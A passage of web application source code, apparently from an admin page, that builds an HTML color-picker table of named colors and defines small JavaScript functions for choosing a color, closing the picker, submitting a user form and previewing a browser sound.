href=\"javascript:choose_color('9400D3');\"><font size=1 face='Arial,Helvetica'>#9400D3</a> </td><td bgcolor='#9400D3'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkOrchid </td><td><a href=\"javascript:choose_color('9932CC');\"><font size=1 face='Arial,Helvetica'>#9932CC</a> </td><td bgcolor='#9932CC'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkMagenta </td><td><a href=\"javascript:choose_color('8B008B');\"><font size=1 face='Arial,Helvetica'>#8B008B</a> </td><td bgcolor='#8B008B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Purple </td><td><a href=\"javascript:choose_color('800080');\"><font size=1 face='Arial,Helvetica'>#800080</a> </td><td bgcolor='#800080'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Indigo </td><td><a href=\"javascript:choose_color('4B0082');\"><font size=1 face='Arial,Helvetica'>#4B0082</a> </td><td bgcolor='#4B0082'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>SlateBlue </td><td><a href=\"javascript:choose_color('6A5ACD');\"><font size=1 face='Arial,Helvetica'>#6A5ACD</a> </td><td bgcolor='#6A5ACD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkSlateBlue </td><td><a href=\"javascript:choose_color('483D8B');\"><font size=1 face='Arial,Helvetica'>#483D8B</a> </td><td bgcolor='#483D8B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumSlateBlue </td><td><a href=\"javascript:choose_color('7B68EE');\"><font size=1 face='Arial,Helvetica'>#7B68EE</a> </td><td bgcolor='#7B68EE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>GreenYellow </td><td><a href=\"javascript:choose_color('ADFF2F');\"><font size=1 face='Arial,Helvetica'>#ADFF2F</a> </td><td bgcolor='#ADFF2F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Chartreuse </td><td><a href=\"javascript:choose_color('7FFF00');\"><font size=1 face='Arial,Helvetica'>#7FFF00</a> </td><td bgcolor='#7FFF00'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LawnGreen </td><td><a href=\"javascript:choose_color('7CFC00');\"><font size=1 face='Arial,Helvetica'>#7CFC00</a> </td><td bgcolor='#7CFC00'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Lime </td><td><a href=\"javascript:choose_color('00FF00');\"><font size=1 face='Arial,Helvetica'>#00FF00</a> </td><td bgcolor='#00FF00'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LimeGreen </td><td><a href=\"javascript:choose_color('32CD32');\"><font size=1 face='Arial,Helvetica'>#32CD32</a> </td><td bgcolor='#32CD32'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>PaleGreen </td><td><a href=\"javascript:choose_color('98FB98');\"><font size=1 face='Arial,Helvetica'>#98FB98</a> </td><td bgcolor='#98FB98'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightGreen </td><td><a href=\"javascript:choose_color('90EE90');\"><font size=1 face='Arial,Helvetica'>#90EE90</a> </td><td bgcolor='#90EE90'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumSpringGreen </td><td><a href=\"javascript:choose_color('00FA9A');\"><font size=1 face='Arial,Helvetica'>#00FA9A</a> </td><td bgcolor='#00FA9A'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>SpringGreen </td><td><a href=\"javascript:choose_color('00FF7F');\"><font size=1 face='Arial,Helvetica'>#00FF7F</a> </td><td bgcolor='#00FF7F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumSeaGreen </td><td><a href=\"javascript:choose_color('3CB371');\"><font size=1 face='Arial,Helvetica'>#3CB371</a> </td><td bgcolor='#3CB371'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>SeaGreen </td><td><a href=\"javascript:choose_color('2E8B57');\"><font size=1 face='Arial,Helvetica'>#2E8B57</a> </td><td bgcolor='#2E8B57'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>ForestGreen </td><td><a href=\"javascript:choose_color('228B22');\"><font size=1 face='Arial,Helvetica'>#228B22</a> </td><td bgcolor='#228B22'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Green </td><td><a href=\"javascript:choose_color('008000');\"><font size=1 face='Arial,Helvetica'>#008000</a> </td><td bgcolor='#008000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkGreen </td><td><a href=\"javascript:choose_color('006400');\"><font size=1 face='Arial,Helvetica'>#006400</a> </td><td bgcolor='#006400'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>YellowGreen </td><td><a href=\"javascript:choose_color('9ACD32');\"><font size=1 face='Arial,Helvetica'>#9ACD32</a> </td><td bgcolor='#9ACD32'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>OliveDrab </td><td><a href=\"javascript:choose_color('6B8E23');\"><font size=1 face='Arial,Helvetica'>#6B8E23</a> </td><td bgcolor='#6B8E23'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Olive </td><td><a href=\"javascript:choose_color('808000');\"><font size=1 face='Arial,Helvetica'>#808000</a> </td><td bgcolor='#808000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkOliveGreen </td><td><a href=\"javascript:choose_color('556B2F');\"><font size=1 face='Arial,Helvetica'>#556B2F</a> </td><td bgcolor='#556B2F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>MediumAquamarine </td><td><a href=\"javascript:choose_color('66CDAA');\"><font size=1 face='Arial,Helvetica'>#66CDAA</a> </td><td bgcolor='#66CDAA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkSeaGreen </td><td><a href=\"javascript:choose_color('8FBC8B');\"><font size=1 face='Arial,Helvetica'>#8FBC8B</a> </td><td bgcolor='#8FBC8B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightSeaGreen </td><td><a href=\"javascript:choose_color('20B2AA');\"><font size=1 face='Arial,Helvetica'>#20B2AA</a> </td><td bgcolor='#20B2AA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkCyan </td><td><a href=\"javascript:choose_color('008B8B');\"><font size=1 face='Arial,Helvetica'>#008B8B</a> </td><td bgcolor='#008B8B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Teal </td><td><a href=\"javascript:choose_color('008080');\"><font size=1 face='Arial,Helvetica'>#008080</a> </td><td bgcolor='#008080'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Aqua </td><td><a href=\"javascript:choose_color('00FFFF');\"><font size=1 face='Arial,Helvetica'>#00FFFF</a> </td><td bgcolor='#00FFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Cyan </td><td><a href=\"javascript:choose_color('00FFFF');\"><font size=1 face='Arial,Helvetica'>#00FFFF</a> </td><td bgcolor='#00FFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightCyan </td><td><a href=\"javascript:choose_color('E0FFFF');\"><font size=1 face='Arial,Helvetica'>#E0FFFF</a> </td><td bgcolor='#E0FFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>PaleTurquoise </td><td><a href=\"javascript:choose_color('AFEEEE');\"><font size=1 face='Arial,Helvetica'>#AFEEEE</a> </td><td bgcolor='#AFEEEE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Aquamarine </td><td><a href=\"javascript:choose_color('7FFFD4');\"><font size=1 face='Arial,Helvetica'>#7FFFD4</a> </td><td bgcolor='#7FFFD4'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Turquoise </td><td><a href=\"javascript:choose_color('40E0D0');\"><font size=1 face='Arial,Helvetica'>#40E0D0</a> </td><td bgcolor='#40E0D0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumTurquoise </td><td><a href=\"javascript:choose_color('48D1CC');\"><font size=1 face='Arial,Helvetica'>#48D1CC</a> </td><td bgcolor='#48D1CC'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkTurquoise </td><td><a href=\"javascript:choose_color('00CED1');\"><font size=1 face='Arial,Helvetica'>#00CED1</a> </td><td bgcolor='#00CED1'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>CadetBlue </td><td><a href=\"javascript:choose_color('5F9EA0');\"><font size=1 face='Arial,Helvetica'>#5F9EA0</a> </td><td bgcolor='#5F9EA0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>SteelBlue </td><td><a href=\"javascript:choose_color('4682B4');\"><font size=1 face='Arial,Helvetica'>#4682B4</a> </td><td bgcolor='#4682B4'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightSteelBlue </td><td><a href=\"javascript:choose_color('B0C4DE');\"><font size=1 face='Arial,Helvetica'>#B0C4DE</a> </td><td bgcolor='#B0C4DE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>PowderBlue </td><td><a href=\"javascript:choose_color('B0E0E6');\"><font size=1 face='Arial,Helvetica'>#B0E0E6</a> </td><td bgcolor='#B0E0E6'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightBlue </td><td><a href=\"javascript:choose_color('ADD8E6');\"><font size=1 face='Arial,Helvetica'>#ADD8E6</a> </td><td bgcolor='#ADD8E6'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>SkyBlue </td><td><a href=\"javascript:choose_color('87CEEB');\"><font size=1 face='Arial,Helvetica'>#87CEEB</a> </td><td bgcolor='#87CEEB'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightSkyBlue </td><td><a href=\"javascript:choose_color('87CEFA');\"><font size=1 face='Arial,Helvetica'>#87CEFA</a> </td><td bgcolor='#87CEFA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DeepSkyBlue </td><td><a href=\"javascript:choose_color('00BFFF');\"><font size=1 face='Arial,Helvetica'>#00BFFF</a> </td><td bgcolor='#00BFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DodgerBlue </td><td><a href=\"javascript:choose_color('1E90FF');\"><font size=1 face='Arial,Helvetica'>#1E90FF</a> </td><td bgcolor='#1E90FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>CornflowerBlue </td><td><a href=\"javascript:choose_color('6495ED');\"><font size=1 face='Arial,Helvetica'>#6495ED</a> </td><td bgcolor='#6495ED'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MediumSlateBlue </td><td><a href=\"javascript:choose_color('7B68EE');\"><font size=1 face='Arial,Helvetica'>#7B68EE</a> </td><td bgcolor='#7B68EE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>RoyalBlue </td><td><a href=\"javascript:choose_color('4169E1');\"><font size=1 face='Arial,Helvetica'>#4169E1</a> </td><td bgcolor='#4169E1'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Blue </td><td><a href=\"javascript:choose_color('0000FF');\"><font size=1 face='Arial,Helvetica'>#0000FF</a> </td><td bgcolor='#0000FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>MediumBlue </td><td><a href=\"javascript:choose_color('0000CD');\"><font size=1 face='Arial,Helvetica'>#0000CD</a> </td><td bgcolor='#0000CD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkBlue </td><td><a href=\"javascript:choose_color('00008B');\"><font size=1 face='Arial,Helvetica'>#00008B</a> </td><td bgcolor='#00008B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Navy </td><td><a href=\"javascript:choose_color('000080');\"><font size=1 face='Arial,Helvetica'>#000080</a> </td><td bgcolor='#000080'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MidnightBlue </td><td><a href=\"javascript:choose_color('191970');\"><font size=1 face='Arial,Helvetica'>#191970</a> </td><td bgcolor='#191970'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Cornsilk </td><td><a href=\"javascript:choose_color('FFF8DC');\"><font size=1 face='Arial,Helvetica'>#FFF8DC</a> </td><td bgcolor='#FFF8DC'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>BlanchedAlmond </td><td><a href=\"javascript:choose_color('FFEBCD');\"><font size=1 face='Arial,Helvetica'>#FFEBCD</a> </td><td bgcolor='#FFEBCD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Bisque </td><td><a href=\"javascript:choose_color('FFE4C4');\"><font size=1 face='Arial,Helvetica'>#FFE4C4</a> </td><td bgcolor='#FFE4C4'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>NavajoWhite </td><td><a href=\"javascript:choose_color('FFDEAD');\"><font size=1 face='Arial,Helvetica'>#FFDEAD</a> </td><td bgcolor='#FFDEAD'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Wheat </td><td><a href=\"javascript:choose_color('F5DEB3');\"><font size=1 face='Arial,Helvetica'>#F5DEB3</a> </td><td bgcolor='#F5DEB3'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>BurlyWood </td><td><a href=\"javascript:choose_color('DEB887');\"><font size=1 face='Arial,Helvetica'>#DEB887</a> </td><td bgcolor='#DEB887'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Tan </td><td><a href=\"javascript:choose_color('D2B48C');\"><font size=1 face='Arial,Helvetica'>#D2B48C</a> </td><td bgcolor='#D2B48C'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>RosyBrown </td><td><a href=\"javascript:choose_color('BC8F8F');\"><font size=1 face='Arial,Helvetica'>#BC8F8F</a> </td><td bgcolor='#BC8F8F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>SandyBrown </td><td><a href=\"javascript:choose_color('F4A460');\"><font size=1 face='Arial,Helvetica'>#F4A460</a> </td><td bgcolor='#F4A460'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Goldenrod </td><td><a href=\"javascript:choose_color('DAA520');\"><font size=1 face='Arial,Helvetica'>#DAA520</a> </td><td bgcolor='#DAA520'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkGoldenrod </td><td><a href=\"javascript:choose_color('B8860B');\"><font size=1 face='Arial,Helvetica'>#B8860B</a> </td><td bgcolor='#B8860B'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Peru </td><td><a href=\"javascript:choose_color('CD853F');\"><font size=1 face='Arial,Helvetica'>#CD853F</a> </td><td bgcolor='#CD853F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Chocolate </td><td><a href=\"javascript:choose_color('D2691E');\"><font size=1 face='Arial,Helvetica'>#D2691E</a> </td><td bgcolor='#D2691E'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>SaddleBrown </td><td><a href=\"javascript:choose_color('8B4513');\"><font size=1 face='Arial,Helvetica'>#8B4513</a> </td><td bgcolor='#8B4513'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Sienna </td><td><a href=\"javascript:choose_color('A0522D');\"><font size=1 face='Arial,Helvetica'>#A0522D</a> </td><td bgcolor='#A0522D'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Brown </td><td><a href=\"javascript:choose_color('A52A2A');\"><font size=1 face='Arial,Helvetica'>#A52A2A</a> </td><td bgcolor='#A52A2A'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Maroon </td><td><a href=\"javascript:choose_color('800000');\"><font size=1 face='Arial,Helvetica'>#800000</a> </td><td bgcolor='#800000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>White </td><td><a href=\"javascript:choose_color('FFFFFF');\"><font size=1 face='Arial,Helvetica'>#FFFFFF</a> </td><td bgcolor='#FFFFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Snow </td><td><a href=\"javascript:choose_color('FFFAFA');\"><font size=1 face='Arial,Helvetica'>#FFFAFA</a> </td><td bgcolor='#FFFAFA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>HoneyDew </td><td><a href=\"javascript:choose_color('F0FFF0');\"><font size=1 face='Arial,Helvetica'>#F0FFF0</a> </td><td bgcolor='#F0FFF0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>MintCream </td><td><a href=\"javascript:choose_color('F5FFFA');\"><font size=1 face='Arial,Helvetica'>#F5FFFA</a> </td><td bgcolor='#F5FFFA'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Azure </td><td><a href=\"javascript:choose_color('F0FFFF');\"><font size=1 face='Arial,Helvetica'>#F0FFFF</a> </td><td bgcolor='#F0FFFF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>AliceBlue </td><td><a href=\"javascript:choose_color('F0F8FF');\"><font size=1 face='Arial,Helvetica'>#F0F8FF</a> </td><td bgcolor='#F0F8FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>GhostWhite </td><td><a href=\"javascript:choose_color('F8F8FF');\"><font size=1 face='Arial,Helvetica'>#F8F8FF</a> </td><td bgcolor='#F8F8FF'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>WhiteSmoke </td><td><a href=\"javascript:choose_color('F5F5F5');\"><font size=1 face='Arial,Helvetica'>#F5F5F5</a> </td><td bgcolor='#F5F5F5'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>SeaShell </td><td><a href=\"javascript:choose_color('FFF5EE');\"><font size=1 face='Arial,Helvetica'>#FFF5EE</a> </td><td bgcolor='#FFF5EE'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Beige </td><td><a href=\"javascript:choose_color('F5F5DC');\"><font size=1 face='Arial,Helvetica'>#F5F5DC</a> </td><td bgcolor='#F5F5DC'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>OldLace </td><td><a href=\"javascript:choose_color('FDF5E6');\"><font size=1 face='Arial,Helvetica'>#FDF5E6</a> </td><td bgcolor='#FDF5E6'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>FloralWhite </td><td><a href=\"javascript:choose_color('FFFAF0');\"><font size=1 face='Arial,Helvetica'>#FFFAF0</a> </td><td bgcolor='#FFFAF0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Ivory </td><td><a href=\"javascript:choose_color('FFFFF0');\"><font size=1 face='Arial,Helvetica'>#FFFFF0</a> </td><td bgcolor='#FFFFF0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>AntiqueWhite </td><td><a href=\"javascript:choose_color('FAEBD7');\"><font size=1 face='Arial,Helvetica'>#FAEBD7</a> </td><td bgcolor='#FAEBD7'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Linen </td><td><a href=\"javascript:choose_color('FAF0E6');\"><font size=1 face='Arial,Helvetica'>#FAF0E6</a> </td><td bgcolor='#FAF0E6'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LavenderBlush </td><td><a href=\"javascript:choose_color('FFF0F5');\"><font size=1 face='Arial,Helvetica'>#FFF0F5</a> </td><td bgcolor='#FFF0F5'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>MistyRose </td><td><a href=\"javascript:choose_color('FFE4E1');\"><font size=1 face='Arial,Helvetica'>#FFE4E1</a> </td><td bgcolor='#FFE4E1'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Gainsboro </td><td><a href=\"javascript:choose_color('DCDCDC');\"><font size=1 face='Arial,Helvetica'>#DCDCDC</a> </td><td bgcolor='#DCDCDC'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>LightGray </td><td><a href=\"javascript:choose_color('D3D3D3');\"><font size=1 face='Arial,Helvetica'>#D3D3D3</a> </td><td bgcolor='#D3D3D3'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Silver </td><td><a href=\"javascript:choose_color('C0C0C0');\"><font size=1 face='Arial,Helvetica'>#C0C0C0</a> </td><td bgcolor='#C0C0C0'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DarkGray </td><td><a href=\"javascript:choose_color('A9A9A9');\"><font size=1 face='Arial,Helvetica'>#A9A9A9</a> </td><td bgcolor='#A9A9A9'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>Gray </td><td><a href=\"javascript:choose_color('808080');\"><font size=1 face='Arial,Helvetica'>#808080</a> </td><td bgcolor='#808080'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>DimGray </td><td><a href=\"javascript:choose_color('696969');\"><font size=1 face='Arial,Helvetica'>#696969</a> </td><td bgcolor='#696969'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>LightSlateGray </td><td><a href=\"javascript:choose_color('778899');\"><font size=1 face='Arial,Helvetica'>#778899</a> </td><td bgcolor='#778899'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>SlateGray </td><td><a href=\"javascript:choose_color('708090');\"><font size=1 face='Arial,Helvetica'>#708090</a> </td><td bgcolor='#708090'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#E6E6E6\"><td>DarkSlateGray </td><td><a href=\"javascript:choose_color('2F4F4F');\"><font size=1 face='Arial,Helvetica'>#2F4F4F</a> </td><td bgcolor='#2F4F4F'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr><tr bgcolor=\"#F6F6F6\"><td>Black </td><td><a href=\"javascript:choose_color('000000');\"><font size=1 face='Arial,Helvetica'>#000000</a> </td><td bgcolor='#000000'> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </td></tr></table></div></span>";

		document.getElementById("audio_chooser_span").style.position = "absolute";
		document.getElementById("audio_chooser_span").style.left = "220px";
		document.getElementById("audio_chooser_span").style.top = vposition + "px";
		document.getElementById("audio_chooser_span").style.visibility = 'visible';
		document.getElementById("audio_chooser_span").style.backgroundcolor = 'white';
		document.getElementById("audio_chooser_span").innerHTML = span_content;
		}

	function choose_color(colorname)
		{
		if (colorname.length > 0)
			{
			if (chooser_type == '2')
				{
				document.getElementById(chooser_field).value = colorname;
				document.getElementById(chooser_field_td).style.backgroundColor = '#' + colorname;
				}
			else
				{
				document.getElementById(chooser_field).value = '#' + colorname;
				document.getElementById(chooser_field_td).style.backgroundColor = '#' + colorname;
				}
			close_chooser();
			}
		}

	function close_chooser()
		{
		document.getElementById("audio_chooser_span").style.visibility = 'hidden';
		document.getElementById("audio_chooser_span").innerHTML = '';
		}

	function user_submit()
		{
		var user_field = document.getElementById("user");
		user_field.disabled = false;
		document.userform.submit();
		}

	function play_browser_sound(temp_element,temp_volume)
		{
		var taskIndex = document.getElementById(temp_element).selectedIndex;
		var taskValue = document.getElementById(temp_element).options[taskIndex].value;
		var temp_selected_element = 'BAS_' + taskValue;
		if ( (taskValue != '---NONE---') && (taskValue != '---DISABLED---') && (taskValue != '') )
			{
			var temp_audio = document.getElementById(temp_selected_element);
			var taskVolIndex = document.getElementById(temp_volume).selectedIndex;
			var taskVolValue = document.getElementById(temp_volume).options[taskVolIndex].value;
			var temp_js_volume = (taskVolValue * .01);
			temp_audio.volume = temp_js_volume;
		//	alert(temp_selected_element + ' ' + temp_js_volume);
			temp_audio.play();
			}
		}



<!--



.auraltext
	{
	position: absolute;
	font-size: 0;
